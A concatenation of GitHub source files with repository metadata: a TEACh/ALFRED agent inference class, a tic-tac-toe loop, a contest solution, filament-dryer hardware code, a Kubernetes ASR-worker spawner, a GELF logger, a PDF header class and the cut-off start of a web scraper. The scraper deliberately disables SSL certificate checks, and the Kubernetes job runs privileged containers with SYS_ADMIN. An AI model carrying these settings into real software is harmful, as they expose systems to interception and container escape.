= 0\n self.device = None\n return agent\n\n def get_rollout_actor(self, ):\n self.rollout_actor = RolloutActorLocal(experiment_name=exp_name,\n agent=self.agent,\n env=env,\n dataset_proc=None,\n param_server_proc=None,\n max_horizon=horizon,\n dataset_device=dataset_device,\n index=1,\n collect_trace=visualize_rollouts,\n lightweight_mode=not visualize_rollouts)\n\n def _extract_reference_semantic_image(self, event):\n num_objects = segdef.get_num_objects()\n h, w = event.frame.shape[0:2]\n seg_image = torch.zeros([num_objects, h, w], dtype=torch.int16, device=device)\n\n inventory_obj_strs = set()\n for object in event.metadata['inventoryObjects']:\n inventory_obj_string = object['objectType'].split(\"_\")[0]\n inventory_obj_strs.add(inventory_obj_string)\n\n for obj_str, class_mask in event.class_masks.items():\n obj_int = segdef.object_string_to_intid(obj_str)\n class_mask_t = torch.from_numpy(class_mask.astype(np.int16)).to(device)\n seg_image[obj_int] = torch.max(seg_image[obj_int], class_mask_t)\n return seg_image.type(torch.ByteTensor)\n\n def _make_observation(self):\n\n event = self.latest_event\n if event.frame is not None:\n rgb_image = torch.from_numpy(event.frame.copy()).permute((2, 0, 1)).unsqueeze(0).half() / 255\n else:\n rgb_image = torch.zeros((1, 3, 300, 300))\n # Depth\n if self.exp_def.Setup.env_setup.d.get(\"reference_depth\"):\n depth_image = torch.from_numpy(event.depth_frame.copy()).unsqueeze(0).unsqueeze(0) / 1000\n else:\n _, pred_depth = 
self.depth_model.predict(rgb_image.float().to(self.PERCEPTION_DEVICE))\n depth_image = pred_depth.to(\"cpu\") # TODO: Maybe skip this? We later move it to GPU anyway\n\n # Segmentation\n if self.exp_def.Setup.env_setup.d.get(\"reference_segmentation\"):\n semantic_image = self._extract_reference_semantic_image(event)\n semantic_image = semantic_image.unsqueeze(0)\n else:\n pred_seg, _ = self.seg_model.predict(rgb_image.float().to(self.PERCEPTION_DEVICE))\n semantic_image = pred_seg\n\n # Simple error detection from RGB image changes\n action_failed = False\n if self.latest_observation is not None:\n assert self.latest_action is not None, \"Didn't log an action, but got two observations in a row?\"\n rgb_diff = (rgb_image - self.latest_observation.rgb_image).float().abs().mean()\n if rgb_diff < 1e-4:\n print(f\"Action: {self.latest_action}, RGB Diff: {rgb_diff}. Counting as failed.\")\n action_failed = True\n else:\n pass\n\n if not action_failed and self.latest_action is not None:\n self.pose_info.simulate_successful_action(self.latest_action)\n oinv = copy.deepcopy(self.inventory_info)\n self.inventory_info.simulate_successful_action(self.latest_action, self.latest_observation)\n if len(oinv.inventory_object_ids) != len(self.inventory_info.inventory_object_ids):\n print(self.inventory_info.summarize())\n\n # Pose\n if self.exp_def.Setup.env_setup.d.get(\"reference_pose\"):\n self.pose_info = PoseInfo.from_ai2thor_event(event)\n\n T_world_to_cam = self.pose_info.get_pose_mat()\n cam_horizon_deg = [self.pose_info.cam_horizon_deg]\n agent_pos = self.pose_info.get_agent_pos()\n\n # Inventory\n if self.exp_def.Setup.env_setup.d.get(\"reference_inventory\"):\n self.inventory_info = InventoryInfo.from_ai2thor_event(event)\n inventory_vector = self.inventory_info.get_inventory_vector()\n inventory_vector = inventory_vector.unsqueeze(0)\n\n privileged_info = PrivilegedInfo(event)\n\n observation = AlfredObservation(rgb_image,\n depth_image,\n semantic_image,\n inventory_vector,\n T_world_to_cam,\n self.fov,\n cam_horizon_deg,\n privileged_info)\n observation.set_agent_pos(agent_pos)\n if action_failed:\n observation.set_error_causing_action(self.latest_action)\n\n # Add extra RGB frames from smooth navigation\n if self.latest_extra_events:\n extra_frames = [torch.from_numpy(e.frame.copy()).permute((2, 0, 1)).unsqueeze(0).half() / 255 for e in self.latest_extra_events]\n observation.extra_rgb_frames = extra_frames\n task = None\n\n return observation\n\n\n def reset(self, event):\n # First reset everything\n self.latest_event = event\n self.first_event = event\n self.latest_action = None\n self.latest_observation = None\n\n # Initialize pose and inventory\n if self.exp_def.Setup.env_setup.d.get(\"reference_pose\"):\n self.pose_info = PoseInfo.from_ai2thor_event(event)\n else:\n self.pose_info = PoseInfo.create_new_initial()\n\n if self.exp_def.Setup.env_setup.d.get(\"reference_inventory\"):\n self.inventory_info = InventoryInfo.from_ai2thor_event(event)\n else:\n self.inventory_info = InventoryInfo.create_empty_initial()\n\n # Make the first observation\n self.latest_observation = copy.deepcopy(self._make_observation())\n return self.latest_observation\n\n\n def start_new_edh_instance(self, original_edh_instance, edh_instance, edh_history_images, simulator, task, instance_file, game_file, edh_name=None):\n\n game = json.load(open(game_file, \"r\"))\n event = simulator.controller.last_event\n observation = self.reset(event)\n self.model.start_new_rollout(task)\n self.task = task\n self.game = 
game\n\n\n return True\n\n\n def to_thor_api_exec(self, action, simulator, object_id=\"\", smooth_nav=False, debug_print_all_sim_steps=True):\n # TODO: parametrized navigation commands\n print(action)\n if action in [\"Forward\", \"MoveAhead\", \"Move Ahead\"]:\n ac = dict(action=\"MoveAhead\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Backward\", \"MoveBack\", \"Move Back\"]:\n ac = dict(action=\"MoveBack\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Look Up\", \"LookUp\"]:\n ac = dict(action=\"LookUp\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Look Down\", \"LookDown\"]:\n ac = dict(action=\"LookDown\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Turn Left\", \"TurnLeft\", \"RotateLeft\", \"Rotate Left\"]:\n ac = dict(action=\"RotateLeft\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Turn Right\", \"TurnRight\", \"RotateRight\", \"Rotate Right\"]:\n ac = dict(action=\"RotateRight\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Pan Left\", \"PanLeft\", \"MoveLeft\", \"Move Left\"]: # strafe left\n ac = dict(action=\"MoveLeft\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action in [\"Pan Right\", \"PanRight\", \"MoveRight\", \"Move Right\"]: # strafe right\n ac = dict(action=\"MoveRight\", forceAction=True)\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n elif action == \"Stop\": # do nothing\n ac = dict(action=\"Pass\")\n if debug_print_all_sim_steps:\n logger.info(\"step %s\", ac)\n e = simulator.controller.step(ac)\n else:\n logger.warning(\"%s: Motion not supported\" % action)\n # `interaction` is not defined in this scope, so just report the failure\n return False, \"\", None\n\n return e, action\n\n\n def _error_is_fatal(self, err):\n self.fail_count += 1\n if self.fail_count >= self.max_fails:\n print(f\"EXCEEDED MAXIMUM NUMBER OF FAILURES ({self.max_fails})\")\n return True\n else:\n return False\n\n def prune_by_any_interaction(self, simulator, instances_ids):\n '''\n ignores any object that is not interactable in any way\n '''\n pruned_instance_ids = []\n for obj in simulator.controller.last_event.metadata['objects']:\n obj_id = obj['objectId']\n if obj_id in instances_ids:\n if obj['pickupable'] or obj['receptacle'] or obj['openable'] or obj['toggleable'] or obj['sliceable']:\n pruned_instance_ids.append(obj_id)\n\n ordered_instance_ids = [id for id in instances_ids if id in pruned_instance_ids]\n return ordered_instance_ids\n\n def va_interact(self, action, simulator, interact_mask=None, smooth_nav=True, mask_px_sample=1, debug=False):\n '''\n interact mask based action call\n '''\n\n\n all_ids = []\n\n if type(interact_mask) is str and interact_mask == \"NULL\":\n raise Exception(\"NULL mask.\")\n elif interact_mask is not None:\n # ground-truth instance segmentation mask from THOR\n instance_segs = np.array(simulator.controller.last_event.instance_segmentation_frame)\n\n if debug:\n print(\"step %s\", dict(action=\"Pass\", 
renderObjectImage=True))\n if instance_segs is None:\n simulator.controller.step(action=\"Pass\", renderObjectImage=True)\n instance_segs = np.array(simulator.controller.last_event.instance_segmentation_frame)\n\n color_to_object_id = simulator.controller.last_event.color_to_object_id\n\n # get object_id for each 1-pixel in the interact_mask\n nz_rows, nz_cols = np.nonzero(interact_mask)\n instance_counter = Counter()\n for i in range(0, len(nz_rows), mask_px_sample):\n x, y = nz_rows[i], nz_cols[i]\n #ForkedPdb().set_trace()\n instance = tuple(instance_segs[x, y])\n instance_counter[instance] += 1\n if debug:\n print(\"action_box\", \"instance_counter\", instance_counter)\n\n # iou scores for all instances\n iou_scores = {}\n for color_id, intersection_count in instance_counter.most_common():\n union_count = np.sum(np.logical_or(np.all(instance_segs == color_id, axis=2), interact_mask.astype(bool)))\n iou_scores[color_id] = intersection_count / float(union_count)\n iou_sorted_instance_ids = list(OrderedDict(sorted(iou_scores.items(), key=lambda x: x[1], reverse=True)))\n\n # get the most common object ids ignoring the object-in-hand\n inv_obj = simulator.controller.last_event.metadata['inventoryObjects'][0]['objectId'] \\\n if len(simulator.controller.last_event.metadata['inventoryObjects']) > 0 else None\n all_ids = [color_to_object_id[color_id] for color_id in iou_sorted_instance_ids\n if color_id in color_to_object_id and color_to_object_id[color_id] != inv_obj]\n\n # print all ids\n if debug:\n print(\"action_box\", \"all_ids\", all_ids)\n\n # print instance_ids\n instance_ids = [inst_id for inst_id in all_ids if inst_id is not None]\n if debug:\n print(\"action_box\", \"instance_ids\", instance_ids)\n # prune invalid instances like floors, walls, etc.\n instance_ids = self.prune_by_any_interaction(simulator, instance_ids)\n\n # cv2 imshows to show image, segmentation mask, interact mask\n if debug:\n print(\"action_box\", \"instance_ids\", instance_ids)\n instance_seg = copy.copy(instance_segs)\n instance_seg[:, :, :] = interact_mask[:, :, np.newaxis] == 1\n instance_seg *= 255\n\n cv2.imshow('seg', instance_segs)\n cv2.imshow('mask', instance_seg)\n cv2.imshow('full', simulator.controller.last_event.frame[:,:,::-1])\n cv2.waitKey(0)\n\n if len(instance_ids) == 0:\n err = \"Bad interact mask. 
Couldn't locate target object\"\n success = False\n return success, None, None, err, None\n\n target_instance_id = instance_ids[0]\n else:\n target_instance_id = \"\"\n\n if debug:\n print(\"taking action: \" + str(action) + \" on target_instance_id \" + str(target_instance_id))\n #ForkedPdb().set_trace()\n # event, api_action = self.to_thor_api_exec(action, simulator, target_instance_id, smooth_nav)\n try:\n event, api_action = self.to_thor_api_exec(action, simulator, target_instance_id, smooth_nav)\n except Exception as err:\n success = False\n return success, None, None, err, None\n\n if not event.metadata['lastActionSuccess']:\n if interact_mask is not None and debug:\n print(\"Failed to execute action!\", action, target_instance_id)\n print(\"all_ids inside BBox: \" + str(all_ids))\n instance_seg = copy.copy(instance_segs)\n instance_seg[:, :, :] = interact_mask[:, :, np.newaxis] == 1\n cv2.imshow('seg', instance_segs)\n cv2.imshow('mask', instance_seg)\n cv2.imshow('full', simulator.controller.last_event.frame[:,:,::-1])\n cv2.waitKey(0)\n print(event.metadata['errorMessage'])\n success = False\n return success, event, target_instance_id, event.metadata['errorMessage'], api_action\n\n success = True\n return success, event, target_instance_id, '', api_action\n\n\n def step(self, action, simulator):\n\n # The ALFRED API does not accept the Stop action, do nothing\n message = \"\"\n #ForkedPdb().set_trace()\n if action.is_stop():\n done = True\n transition_reward = 0\n api_action = None\n events = []\n\n # Execute all other actions in the ALFRED API\n else:\n definitions = Definitions(version=\"2.0\")\n #action_definition = definitions.map_actions_id2info[action.action_id]\n alfred_action, interact_mask = action.to_teach_api()\n\n ret = self.va_interact(alfred_action, simulator, interact_mask, smooth_nav=self.smooth_nav)\n\n # Default version of ALFRED\n if len(ret) == 5:\n exec_success, event, target_instance_id, err, api_action = ret\n events = []\n # Patched version of ALFRED that returns intermediate events from smooth actions\n # To use this, apply the patch alfred-patch.patch onto the ALFRED code:\n # $ git am alfred-patch.patch\n elif len(ret) == 6:\n exec_success, event, events, target_instance_id, err, api_action = ret\n else:\n raise ValueError(\"Invalid number of return values from ThorEnv\")\n #ForkedPdb().set_trace()\n\n # if not self.task.traj_data.is_test():\n # transition_reward, done = self.thor_env.get_transition_reward()\n # done = False\n # else:\n transition_reward, done = 0, False\n\n if not exec_success:\n fatal = self._error_is_fatal(err)\n print(f\"ThorEnv {'fatal' if fatal else 'non-fatal'} Exec Error: {err}\")\n if fatal:\n done = True\n api_action = None\n message = str(err)\n\n #self.prof.tick(\"step\")\n\n # Track state (pose and inventory) from RGB images and actions\n event = simulator.controller.last_event\n # self.state_tracker.log_action(action)\n self.latest_action = action\n self.latest_event = event\n self.latest_extra_events = events\n self.latest_observation = copy.deepcopy(self._make_observation())\n\n observation = copy.deepcopy(self.latest_observation)\n observation.privileged_info.attach_task(self.task) # TODO: See if we can get rid of this?\n if self.device:\n observation = observation.to(self.device)\n\n # if not self.task.traj_data.is_test():\n # reward = transition_reward - 0.05\n # goal_satisfied = self.thor_env.get_goal_satisfied()\n # goal_conditions_met = self.thor_env.get_goal_conditions_met()\n # task_success = goal_satisfied\n # md 
= {\n # \"success\": task_success,\n # \"goal_satisfied\": goal_satisfied,\n # \"goal_conditions_met\": goal_conditions_met,\n # \"message\": message,\n # }\n # else:\n reward = 0\n md = {}\n\n self.steps += 1\n\n return observation, reward, done, md, exec_success\n\n def get_next_action(self, img, original_edh_instance, edh_instance, prev_action, simulator, img_name=None, edh_name=None):\n \"\"\"\n Sample function producing random actions at every time step. When running model inference, a model should be\n called in this function instead.\n :param img: PIL Image containing agent's egocentric image\n :param edh_instance: EDH instance\n :param prev_action: One of None or a dict with keys 'action' and 'obj_relative_coord' containing returned values\n from a previous call of get_next_action\n :param img_name: image file name\n :param edh_name: EDH instance file name\n :return action: An action name from all_agent_actions\n :return obj_relative_coord: A relative (x, y) coordinate (values between 0 and 1) indicating an object in the image;\n The TEACh wrapper on AI2-THOR examines the ground truth segmentation mask of the agent's egocentric image, selects\n an object in a 10x10 pixel patch around the pixel indicated by the coordinate if the desired action can be\n performed on it, and executes the action in AI2-THOR.\n \"\"\"\n # img_feat = self.extractor.featurize([img], batch=1)\n # self.input_dict[\"frames\"] = img_feat\n\n #ForkedPdb().set_trace()\n with torch.no_grad():\n #prev_api_action = None\n #if prev_action is not None and \"action\" in prev_action:\n # prev_api_action = prev_action[\"action\"]\n\n next_observation, reward, done, md, exec_success = self.step(prev_action, simulator)\n #ForkedPdb().set_trace()\n action = self.model.act(next_observation)\n #ForkedPdb().set_trace()\n self.counter += 1\n return action, exec_success#predicted_click\n\n def get_obj_click(self, obj_class_idx, img):\n rcnn_pred = self.object_predictor.predict_objects(img)\n obj_class_name = self.object_predictor.vocab_obj.index2word(obj_class_idx)\n candidates = list(filter(lambda p: p.label == obj_class_name, rcnn_pred))\n if len(candidates) == 0:\n return [np.random.uniform(), np.random.uniform()]\n index = np.argmax([p.score for p in candidates])\n mask = candidates[index].mask[0]\n predicted_click = list(np.array(mask.nonzero()).mean(axis=1))\n predicted_click = [\n predicted_click[0] / mask.shape[1],\n predicted_click[1] / mask.shape[0],\n ]\n return predicted_click\n\n def obstruction_detection(self, action, prev_action_success, m_out, vocab_out):\n \"\"\"\n change 'MoveAhead' action to a turn in case it has failed previously\n \"\"\"\n if action != \"Forward\" or prev_action_success:\n return action\n dist_action = m_out[\"action\"][0][0].detach().cpu()\n idx_rotateR = vocab_out.word2index(\"Turn Right\")\n idx_rotateL = vocab_out.word2index(\"Turn Left\")\n action = \"Turn Left\" if dist_action[idx_rotateL] > dist_action[idx_rotateR] else \"Turn Right\"\n logger.debug(\"Blocking action is changed to: %s\" % str(action))\n return action\n","repo_name":"goonmeet/hlsm_inference_teach","sub_path":"src/teach/inference/hlsm_model.py","file_name":"hlsm_model.py","file_ext":"py","file_size_in_byte":27872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"5162028612","text":"import os, pygame, grid\n\n\n\n\npygame.init()\n\n\n\"\"\"\nImplementation of the minimax algorithm for the game of tic-tac-toe\n\"\"\"\n\n\n\ndef main():\n \"\"\"\n Main function 
wywolujaca pozostlae funkcje\n \"\"\"\n grid.clean()\n h_choice = 'X' # X or O\n c_choice = 'O' # X or O\n first = 'Y' # gracz jest pierwszy\n\n # glowna petla programu\n while len(grid.empty_cells(grid.board)) > 0 and not grid.game_over(grid.board):\n if first == 'N':\n grid.ai_turn(c_choice, h_choice)\n first = ''\n\n grid.human_turn(c_choice, h_choice)\n\n grid.ai_turn(c_choice, h_choice)\n\n # wiadomosc na koniec gry\n if grid.wins(grid.board, grid.HUMAN):\n grid.clean()\n print(f'Human turn [{h_choice}]')\n # grid.render(grid.board, c_choice, h_choice)\n print('YOU WIN!')\n elif grid.wins(grid.board, grid.COMP):\n grid.clean()\n print(f'Computer turn [{c_choice}]')\n #grid.render(grid.board, c_choice, h_choice)\n print('YOU LOSE!')\n else:\n grid.clean()\n #grid.render(grid.board, c_choice, h_choice)\n print('DRAW!')\n\n exit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Krokos11/Kolko-i-Krzyzyk","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15053863209","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jan 20 15:45:54 2019\r\nABC039D\r\n@author: maezawa\r\n\"\"\"\r\n\r\nimport itertools as itr\r\nimport copy\r\n\r\nh, w = list(map(int, input().split()))\r\na = [['_']*(w+2) for _ in range(h+2)]\r\nfor i in range(1, h+1):\r\n raw = list(input())\r\n a[i][1:w+1] = raw\r\n\r\nb = copy.deepcopy(a)\r\n\r\n#print(*a, sep='\\n')\r\n \r\ndef areblacks(arr, i0, j0):\r\n for i in range(i0-1,i0+2):\r\n for j in range(j0-1,j0+2):\r\n if arr[i][j] == '#':\r\n return True\r\n return False\r\n\r\ndef arewhites(arr, i0, j0):\r\n for i in range(i0-1,i0+2):\r\n for j in range(j0-1,j0+2):\r\n if arr[i][j] == '.':\r\n return True\r\n return False\r\n \r\nfor i, j in itr.product(range(1, h+1),range(1, w+1)):\r\n if a[i][j] == '.':\r\n continue\r\n if arewhites(a, i, j):\r\n b[i][j] = '.'\r\n #print(i,j,b[i][j])\r\n \r\nc = copy.deepcopy(b)\r\nfor i, j in itr.product(range(1, h+1),range(1, w+1)):\r\n if b[i][j] == '#':\r\n continue\r\n if areblacks(b, i, j):\r\n c[i][j] = '#' \r\n\r\nif a == c:\r\n print('possible')\r\n for i in range(1, h+1):\r\n print(''.join(b[i][1:w+1]))\r\nelse:\r\n print('impossible')","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc039/D/4050136.py","file_name":"4050136.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"38936342438","text":"from machine import Pin, I2C\nimport time\n\nimport config\n\n\nclass Heater:\n def __init__(self, hardware: \"Hardware\"):\n self._power = False\n self._board_C = 0.0\n self._hardware = hardware\n self.write_power()\n\n @property\n def power_controlled(self) -> bool:\n if self._board_C > config.HEATER_BOARD_MAX_C:\n return False\n return self._power\n\n def set_power(self, power: bool):\n self._power = power\n\n self.write_power()\n\n def set_board_C(self, board_C: int):\n self._board_C = board_C\n\n self.write_power()\n\n def write_power(self) -> None:\n power = self.power_controlled\n\n self._hardware.PIN_GPIO_HEATER_A.value(power)\n self._hardware.PIN_GPIO_HEATER_B.value(power)\n\n\nclass Hardware:\n def __init__(self):\n self.PIN_GPIO_BUTTON = Pin(\"GPIO22\", mode=Pin.IN, pull=Pin.PULL_UP)\n self.PIN_GPIO_LED_GREEN = Pin(\"GPIO21\", mode=Pin.OUT, value=0)\n self.PIN_GPIO_LED_RED = Pin(\"GPIO20\", mode=Pin.OUT, value=0)\n self.PIN_GPIO_LED_WHITE = 
Pin(\"GPIO19\", mode=Pin.OUT, value=0)\n\n self.PIN_GPIO_HEATER_A = Pin(\"GPIO7\", mode=Pin.OUT, value=0)\n self.PIN_GPIO_HEATER_B = Pin(\"GPIO2\", mode=Pin.OUT, value=0)\n\n self.PIN_GPIO_FAN_AMBIENT = Pin(\"GPIO5\", mode=Pin.OUT, value=0) # vorher 0\n self.PIN_GPIO_FAN_FILAMENT = Pin(\"GPIO18\", mode=Pin.OUT, value=0)\n self.PIN_GPIO_FAN_BOX = Pin(\"GPIO4\", mode=Pin.OUT, value=0)\n\n self.i2c0 = I2C(id=0, scl=Pin(\"GPIO17\"), sda=Pin(\"GPIO16\"), freq=400000)\n self.i2c1 = I2C(id=1, scl=Pin(\"GPIO27\"), sda=Pin(\"GPIO26\"), freq=400000)\n self.heater = Heater(self)\n\n def production_test(self, wdt_feed_cb):\n # Neue prints testen\n while True:\n for name, pin in (\n (\"led g\",self.PIN_GPIO_LED_GREEN),\n (\"led r\",self.PIN_GPIO_LED_RED),\n (\"led w\",self.PIN_GPIO_LED_WHITE),\n (\"fan silicagel\",self.PIN_GPIO_FAN_FILAMENT),\n (\"heater a\",self.PIN_GPIO_HEATER_A),\n (\"heater b\",self.PIN_GPIO_HEATER_B),\n (\"fan silicagel\",self.PIN_GPIO_FAN_BOX),\n (\"fan ambient\",self.PIN_GPIO_FAN_AMBIENT),\n\n\n ):\n print(name)\n pin.value(1)\n time.sleep(2)\n pin.value(0)\n wdt_feed_cb()","repo_name":"petermaerki/2023_filament_dryer_git","sub_path":"software/micropython/mod_hardware.py","file_name":"mod_hardware.py","file_ext":"py","file_size_in_byte":2324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74684028392","text":"from kubernetes import client, config\nimport logging\nfrom kubernetes.client.rest import ApiException\nimport random\nimport string\nimport os\nimport sys\n\n\nimport logging\n\n# TODO: remember to change this field to the name of Docker image used\nIMAGE = \"lyvt/online-asr\"\nMASTER = os.getenv(\"MASTER\", False)\nNAMESPACE = os.getenv(\"NAMESPACE\", False)\n\nif (NAMESPACE == False or\n MASTER == False or\n NAMESPACE == False):\n sys.exit(\"No values for NAMESPACE=\"\n + str(NAMESPACE)\n + \" MASTER=\"+str(MASTER)\n + \" NAMESPACE=\"+str(NAMESPACE))\n\nconfig.load_kube_config()\n\n\ndef spawn_worker(model):\n \"\"\"\n Spawn a new worker with the model specified if all the workers are in use.\n Call this function before pop()\n Will not spawn new worker when running as docker-compose up, check 'master:8080'\n\n model : str\n The name of model\n \"\"\"\n if MASTER == 'master:8080':\n return\n\n logging.info(\"start to spawn a new worker with model=\"+model)\n create_job(model)\n\n\ndef id_generator(size=6, chars=string.ascii_lowercase + string.digits):\n return ''.join(random.choice(chars) for _ in range(size))\n\n\ndef create_job(MODEL):\n\n assert MODEL is not None, \"model name is None, cannot spawn a new worker\"\n\n api = client.BatchV1Api()\n\n body = client.V1Job(api_version=\"batch/v1\", kind=\"Job\")\n name = 'speechlab-worker-job-{}-{}'.format(\n MODEL.lower().replace(\"_\", \"-\"), id_generator())\n body.metadata = client.V1ObjectMeta(namespace=NAMESPACE, name=name)\n body.status = client.V1JobStatus()\n template = client.V1PodTemplate()\n template.template = client.V1PodTemplateSpec()\n template.template.metadata = client.V1ObjectMeta(\n annotations={\n \"prometheus.io/scrape\": \"true\",\n \"prometheus.io/port\": \"8081\"\n }\n )\n volume = client.V1Volume(\n # change these values to the same names you used in deployment.yaml\n name=\"local-models\",\n persistent_volume_claim=client.V1PersistentVolumeClaimVolumeSource(\n claim_name=\"local-models-pvc\"\n )\n )\n env_vars = {\n \"MASTER\": MASTER,\n \"NAMESPACE\": NAMESPACE,\n \"RUN_FREQ\": \"ONCE\",\n \"MODEL_DIR\": MODEL, # important\n }\n\n 
env_list = []\n if env_vars:\n for env_name, env_value in env_vars.items():\n env_list.append(client.V1EnvVar(name=env_name, value=env_value))\n\n container = client.V1Container(name='{}-c'.format(name),\n image=IMAGE,\n image_pull_policy=\"IfNotPresent\",\n command=[\"/home/appuser/opt/tini\", \"--\",\n \"/home/appuser/opt/start_worker.sh\"],\n env=env_list,\n ports=[client.V1ContainerPort(\n container_port=8081,\n name=\"prometheus\"\n )],\n security_context=client.V1SecurityContext(\n privileged=True, capabilities=client.V1Capabilities(add=[\"SYS_ADMIN\"])),\n resources=client.V1ResourceRequirements(\n limits={\"memory\": \"4G\", \"cpu\": \"1\"}, \n requests={\"memory\": \"4G\", \"cpu\": \"1\"}\n ),\n volume_mounts=[client.V1VolumeMount(\n # change these values to the same names you used in deployment.yaml\n mount_path=\"/home/appuser/opt/models\",\n name=\"local-models\",\n read_only=True\n )]\n )\n template.template.spec = client.V1PodSpec(containers=[container],\n image_pull_secrets=[\n {\"name\": \"azure_template-cr-secret\"}],\n # reason to use OnFailure https://github.com/kubernetes/kubernetes/issues/20255\n restart_policy=\"OnFailure\",\n volumes=[volume]\n )\n\n # And finaly we can create our V1JobSpec!\n body.spec = client.V1JobSpec(\n ttl_seconds_after_finished=100, template=template.template)\n\n try:\n api_response = api.create_namespaced_job(NAMESPACE, body)\n print(\"api_response=\"+ str(api_response))\n return True\n except ApiException as e:\n logging.exception('error spawning new job')\n print(\"Exception when creating a job: %s\\n\" % e)\n","repo_name":"bchen012/ntu_asr","sub_path":"local-deployment/docker/scripts/master_server_addon.py","file_name":"master_server_addon.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30056410152","text":"from __future__ import print_function\nfrom time import time\nfrom socket import getfqdn, gethostname, socket, AF_INET, SOCK_DGRAM\nfrom StringIO import StringIO\nimport zlib\nimport json\n\nclass Output(object):\n \"\"\"\n Class to redirect logs from stdout to graylog2 server\n \"\"\"\n\n def __init__(self, graylog_server='127.0.0.1', graylog_port=12201,\n level=1, facility='local1',\n max_buffer_size=1400,\n host=getfqdn(gethostname())):\n\n # connection settings\n self.graylog_server = graylog_server\n self.graylog_port = graylog_port\n\n # GELF settings\n self.version = '1.0'\n self.host = host\n self.level = level\n self.facility = facility\n\n self.socket = socket(AF_INET,SOCK_DGRAM)\n\n def send(self, message):\n z = zlib.compress(json.dumps(message))\n self.socket.sendto(z, (self.graylog_server,self.graylog_port))\n\n def processing(self, line):\n \"\"\"\n Processing line (send line to Graylog2 server)\n \"\"\"\n timestamp = int(time())\n short_message = line.strip()\n message = {\n 'version': self.version,\n 'host': self.host,\n 'facility': self.facility,\n 'level': self.level,\n 'timestamp': timestamp,\n 'short_message': short_message\n }\n #try:\n self.send(message)\n #except:\n # print(\"ERROR sending message\")\n","repo_name":"verm666/stdlogger","sub_path":"stdlogger/outputs/gelf.py","file_name":"gelf.py","file_ext":"py","file_size_in_byte":1490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"36022642034","text":"from fpdf import FPDF\nfrom ..fun import age, decode_result\n\nfrom flask.ext.babel import gettext\n\n\nclass PDF(FPDF):\n def __init__(self, 
user, diagnosis):\n super().__init__()\n self.user = user\n self.diagnosis = diagnosis\n self.add_font(\n 'DejaVu', \n '', \n './app/main/util/pdf/fonts/DejaVuSansCondensed.ttf', \n uni=True\n )\n self.add_font(\n 'DejaVu', \n 'B', \n './app/main/util/pdf/fonts/DejaVuSansCondensed-Bold.ttf', \n uni=True\n )\n self.add_font(\n 'DejaVu', \n 'I', \n './app/main/util/pdf/fonts/DejaVuSansCondensed-Oblique.ttf', \n uni=True\n )\n \n\n def header(self):\n # Logo\n self.image('./app/main/util/pdf/Logo.png', 5, 8, 53)\n # Arial bold 15\n self.set_font('DejaVu', '', 9)\n self.set_text_color(105, 105, 105)\n # Move to the right\n self.cell(120)\n # Title\n self.cell(30, 4, gettext('Patient: ') + self.user.first_name + ' ' + self.user.second_name)\n \n self.cell(-30)\n self.cell(0, 14, gettext('Patient username: @') + self.user.username)\n\n self.cell(-70)\n self.cell(0, 24, gettext('Patient age: ') + str(age(self.user.date_of_birth)))\n\n self.cell(-70)\n self.cell(0, 34, gettext('Result: ') + decode_result(\n self.diagnosis.result,\n scrape=False\n )\n )\n\n self.cell(-70)\n self.cell(0, 44, gettext('Date of diagnostics: ') +\n self.diagnosis.checked_on.strftime('%d.%m.%Y %H:%M:%S')\n )\n # Line break\n self.ln(10)\n\n # Page footer\n def footer(self):\n # Position at 1.5 cm from bottom\n self.set_y(-15)\n # Arial italic 8\n self.set_font('DejaVu', 'I', 8)\n # Page number\n self.cell(0, 10, gettext('Page ') + str(self.page_no()) + '/{nb}', 0, 0, 'C')\n","repo_name":"iamdanmaks/spero_backend","sub_path":"app/main/util/pdf/pdf_class.py","file_name":"pdf_class.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15739716362","text":"import urllib.request as urllib\nfrom bs4 import BeautifulSoup\nimport ssl\nimport sqlite3\n\nconn = sqlite3.connect('animals.sqlite')\ncur = conn.cursor()\ncur.executescript('''\nDROP TABLE IF EXISTS Animals;\n\nCREATE TABLE Animals (\n id INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT UNIQUE,\n name TEXT UNIQUE\n)\n''')\n\n# Ignore SSL certificate errors\nctx = ssl.create_default_context()\nctx.check_hostname = False\nctx.verify_mode = ssl.CERT_NONE\n\nANIMALS = dict()\nURL = 